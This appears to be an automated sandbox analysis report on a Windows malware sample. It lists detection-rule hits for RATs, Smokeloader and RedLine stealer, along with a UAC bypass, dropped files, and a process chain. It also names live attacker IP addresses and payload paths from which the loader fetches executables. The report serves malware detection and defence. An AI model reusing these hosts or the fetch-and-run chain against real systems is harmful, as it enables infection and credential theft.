Source: kO1P1YnLst.exe, 00000000.00000003.1790394336.0000000005E4E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1789226034.0000000005E4F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1793507763.0000000005E5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1789284127.0000000005E68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1795126272.0000000005E52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1794708530.0000000005E5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1790487700.0000000005E58000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1795076695.0000000005E73000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1790420213.0000000005E55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe	Binary or memory string: OriginalFilenameFirezer0 vs kO1P1YnLst.exe

Source: kO1P1YnLst.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 18.2.MSBuild.exe.820000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 13.2.run.exe.37b586d.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.cmd.exe.56c5264.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.cmd.exe.60900c8.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 3.2.cmd.exe.56c5e64.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.cmd.exe.57f9264.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 2.2.run.exe.450d86d.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.cmd.exe.57f9e64.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.cmd.exe.5dd00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 2.2.run.exe.4551d5b.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.run.exe.37f9d5b.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.cmd.exe.57b5976.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.cmd.exe.60900c8.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 13.2.run.exe.37f915b.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.cmd.exe.5681976.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.cmd.exe.5dd00c8.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 2.2.run.exe.455115b.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a1537d.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d4d525.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a247a3.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d7432f.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a34dad.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d98739.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000001.00000002.2500065620.0000000004354000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000002.2499937738.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1986065052.0000000004255000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: C:\Users\user\AppData\Local\Temp\pasb, type: DROPPED	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: C:\Users\user\AppData\Local\Temp\khjsru, type: DROPPED	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT

Source: 3.2.cmd.exe.60900c8.8.raw.unpack, -Module-.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 15.2.cmd.exe.5dd00c8.7.raw.unpack, -Module-.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@27/64@4/8

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe

Code function: 1_2_6BBA0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

1_2_6BBA0300

Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe

Code function: 2_2_00DCD660 GetDiskFreeSpaceExW,std::exception::exception,__CxxThrowException@8,

2_2_00DCD660

Source: C:\Users\user\Desktop\kO1P1YnLst.exe

Code function: 0_2_04255BD6 CreateToolhelp32Snapshot,Module32First,

0_2_04255BD6

Source: C:\Users\user\Desktop\kO1P1YnLst.exe

Code function: 0_2_0042628B CoInitialize,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,

0_2_0042628B

Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe

Code function: 2_2_00DA8040 LoadResource,LockResource,SizeofResource,

2_2_00DA8040

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\e7cbbe5f9b9841e6afa735541f989b8a
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe	Mutant created: \Sessions\1\BaseNamedObjects\8dddf1vvvv
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Mutant created: \Sessions\1\BaseNamedObjects\Canon_UIW_Inst_v1
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6916
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess416
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4176:120:WilError_03

Source: C:\Users\user\Desktop\kO1P1YnLst.exe

File created: C:\Users\user\AppData\Local\Temp\u5c4.0.exe

Jump to behavior

Source: Yara match	File source: 5.0.u5c4.3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.1829719005.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1830645130.00000000070B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe, type: DROPPED

Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: eight	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: eight	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: Installed	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: Installed	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: .zip	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: .zip	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: \run.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: \run.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: @	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.90	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.90	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.90	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: Installed	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: Installed	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.228	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.228	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.228	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.59	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.59	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.203	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.203	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: /syncUpd.exe	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: /syncUpd.exe	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: /timeSync.exe	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: /timeSync.exe	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.203	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.59	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: /timeSync.exe	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: /syncUpd.exe	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: .exe	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: .exe	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: /1/Package.zip	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: /1/Package.zip	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: /1/Package.zip	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: .zip	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: .zip	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: \run.exe	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: \run.exe	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.228	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.228	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: /BroomSetup.exe	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: /BroomSetup.exe	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: 185.172.128.228	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: /BroomSetup.exe	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: .exe	0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Command line argument: .exe	0_2_05C04C75

Source: kO1P1YnLst.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor

Source: C:\Users\user\Desktop\kO1P1YnLst.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\kO1P1YnLst.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: u5c4.0.exe, 00000001.00000002.2519692342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2511422871.000000001E636000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: u5c4.0.exe, 00000001.00000002.2519692342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2511422871.000000001E636000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: u5c4.0.exe, 00000001.00000002.2519692342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2511422871.000000001E636000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: u5c4.0.exe, 00000001.00000002.2519692342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2511422871.000000001E636000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: u5c4.0.exe, u5c4.0.exe, 00000001.00000002.2519692342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2511422871.000000001E636000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: u5c4.0.exe, 00000001.00000002.2519692342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2511422871.000000001E636000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: u5c4.0.exe, 00000001.00000002.2519692342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2511422871.000000001E636000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: u5c4.0.exe, 00000001.00000003.1869359519.00000000245B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: u5c4.0.exe, 00000001.00000002.2519692342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2511422871.000000001E636000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: u5c4.0.exe, 00000001.00000002.2519692342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2511422871.000000001E636000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: kO1P1YnLst.exe

ReversingLabs: Detection: 50%

Source: C:\Users\user\Desktop\kO1P1YnLst.exe

File read: C:\Users\user\Desktop\kO1P1YnLst.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\kO1P1YnLst.exe "C:\Users\user\Desktop\kO1P1YnLst.exe"
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Process created: C:\Users\user\AppData\Local\Temp\u5c4.0.exe "C:\Users\user\AppData\Local\Temp\u5c4.0.exe"
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Process created: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe "C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe"
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Process created: C:\Users\user\AppData\Local\Temp\u5c4.3.exe "C:\Users\user\AppData\Local\Temp\u5c4.3.exe"
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6916 -s 944
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe "C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
